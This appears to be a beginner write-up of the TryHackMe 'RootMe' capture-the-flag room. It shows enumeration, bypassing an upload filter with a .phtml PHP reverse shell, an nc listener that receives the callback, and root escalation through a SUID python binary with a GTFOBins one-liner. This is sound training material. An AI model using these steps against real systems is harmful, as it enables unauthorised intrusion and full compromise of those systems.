TryHackMe — RootMe
Difficulty: Easy
Tag line: A CTF for beginners, can you root me?
Once the VPN is set up, we start our enumeration as normal by pinging the target to ensure that the link is stable enough to complete the challenge.
ping
nmap
Interestingly we only have two ports to worry about. Port 22 (ssh) and Port 80 (http)
gobuster
Although a number of directories were shown, we can highlight two of interest. The first panel
and the second uploads
So lets check them out.
website
The initial page is a ticker-tape type view.
If we check the panel
we see an upload form.
So let’s assume that the uploads
will hold these files. Using the pentestmonkey’s php reverse shell we can try to upload the file.
Before we do this make sure that we amend the file to our attacker machine IP and Port address:
Now upload our file.
So not as successful as I would have liked!
Obviously not allowed to upload a .php file. A quick search for valid php file extensions brings up the following:
- .php
- .php3
- .php4
- .php5
- .phtml
Let’s try it with .phtml and see if that works.
Great that works. A quick confirmation from visiting the uploads
directory confirms this.
foothold
Now we have the reverse shell file uploaded. We need to set up our netcat session. I normally use port 4444 (with 8888 for http server set ups when required.)
┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
- -n numeric-only IP addresses, no DNS
- -l listen mode, for inbound connects
- -v verbose
- -p port local port number
Once set up you can simply click on the php link on the website, or my preference is to use the curl
command.
curl http://$IP/uploads/php-reverse-shell.phtml
From the man
command:
curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.
By running the command we get the reverse shell.
┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.56.134] from (UNKNOWN) [10.10.10.174] 34390
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:12:06 up 1:23, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We have a basic shell so let’s make it more interactive.
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z (to background it)
stty raw -echo; fg (brings to foreground - just return twice)
Now we can see the current user from the terminal, and can confirm with id
www-data@rootme:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
escalation
We try to see if www-data has any additional permissions with sudo -l
www-data@rootme:/$ sudo -l
[sudo] password for www-data:
However it requires a password so we need to use other methods to elevate privilege. Checking suid
bits may help. This link gives you some more details.
www-data@rootme:/$ find / -perm -4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
There are a lot of suid files ( I have only shown a few here) but the /usr/bin/python
jumps out from the norm.
Checking on GTFOBINS for python, we see that we have a suid option.
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
We just need to ensure that we amend the path and we should be good to go.
www-data@rootme:/$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/root.txt
THM{p*******************}
summary
A really nice room that brough in two areas I was familiar with, GTFOBINS (suid) and php file extensions.